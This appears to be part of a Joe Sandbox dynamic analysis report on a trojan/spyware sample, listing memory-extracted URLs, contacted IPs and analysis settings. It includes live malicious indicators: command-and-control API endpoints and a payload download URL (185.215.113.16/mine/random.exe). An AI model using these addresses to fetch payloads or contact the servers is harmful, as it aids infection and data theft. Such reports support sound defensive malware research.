https://effecterectz.xyz/apiK	H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542661159.000000000168B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht	firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fa_	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wrathful-jammy.cyou/	c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/	firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://debonairnukk.xyz/api/p8	c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://lv.queniujq.cn	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	firefox.exe, 00000020.00000003.3222273184.000001D7652F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3073852793.000001D76C566000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1283601	firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bbc.co.uk/	firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.org/firefox/addon/to-google-translate/	firefox.exe, 00000020.00000003.3357985948.000001D76C088000.00000004.00000800.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:	firefox.exe, 00000020.00000003.3086830516.000001D76ABCC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1266220	firefox.exe, 00000020.00000003.3303661024.000001D76C246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 00000020.00000003.3357985948.000001D76C05E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/9	c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/recaptcha/	c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz:443/api	c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://spocs.getpocket.com/	firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	firefox.exe, 00000020.00000003.3073620068.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3204896563.000001D76C56E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/t	H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 00000020.00000003.3232463422.000001D7667C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-	firefox.exe, 00000020.00000003.3357985948.000001D76C0B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://effecterectz.xyz/x	c1ca3b12e5.exe, 0000000F.00000003.2861700918.0000000000768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://help.steampowered.com/en/	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/mine/random.exe&G	232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://diffuculttan.xyz/api.0	c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://recaptcha.net/recaptcha/;	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/apiyc	c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://mozilla.org/MPL/2.0/.	firefox.exe, 00000020.00000003.2947408066.000001D763A8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2848798086.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853226348.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3292020914.000001D76AE99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2943605480.000001D76AE45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3266711378.000001D762FB6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3108371159.000001DA0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3129186444.000001D76B1EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2971960415.000001D76AEFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3297328168.000001D76B293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3038002099.000001D763A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AE99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3289452271.000001D766898000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3296269200.000001D7668F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2863058661.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2850940728.000001D763A7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3266711378.000001D762FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3271378134.000001D76B2A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3223066390.000001D765251000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3351738251.000001D76C3B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3113021133.000001D763A78000.00000004.00000800.00020000.00000000.sdmp	false		high
https://debonairnukk.xyz/api	c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://broadcast.st.dl.eccdnx.com	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206ones	232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.zhihu.com/	firefox.exe, 00000020.00000003.3088335348.000001D7667EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://json-schema.org/draft/2019-09/schema	firefox.exe, 00000020.00000003.2990687457.000001D76C592000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3203110763.000001D76C593000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3249184967.000001D76C593000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	232a1df2aa.exe, 0000000E.00000002.3193860810.0000000000C35000.00000040.00000001.01000000.0000000D.sdmp	false		high
https://duckduckgo.com/?t=ffab&q=	firefox.exe, 00000020.00000003.3245468426.000001D764B4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://outlook.live.com/default.aspx?rru=compose&to=%s	firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/Cz	c1ca3b12e5.exe, 0000000F.00000003.2860806346.0000000000799000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.19.228	www.google.com	United States	15169	GOOGLEUS	false
104.21.64.1	deafeninggeh.biz	United States	13335	CLOUDFLARENETUS	false
104.21.22.222	immureprech.biz	United States	13335	CLOUDFLARENETUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.21.51.88	shineugler.biz	United States	13335	CLOUDFLARENETUS	true
142.250.181.46	plus.l.google.com	United States	15169	GOOGLEUS	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
104.21.50.161	tacitglibbr.biz	United States	13335	CLOUDFLARENETUS	false
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
34.107.243.93	push.services.mozilla.com	United States	15169	GOOGLEUS	false
87.120.127.228	unknown	Bulgaria	25206	UNACS-AS-BG8000BurgasBG	true
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
151.101.193.91	services.addons.mozilla.org	United States	54113	FASTLYUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575244
Start date and time:	2024-12-14 23:56:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 20m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@103/23@150/25
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
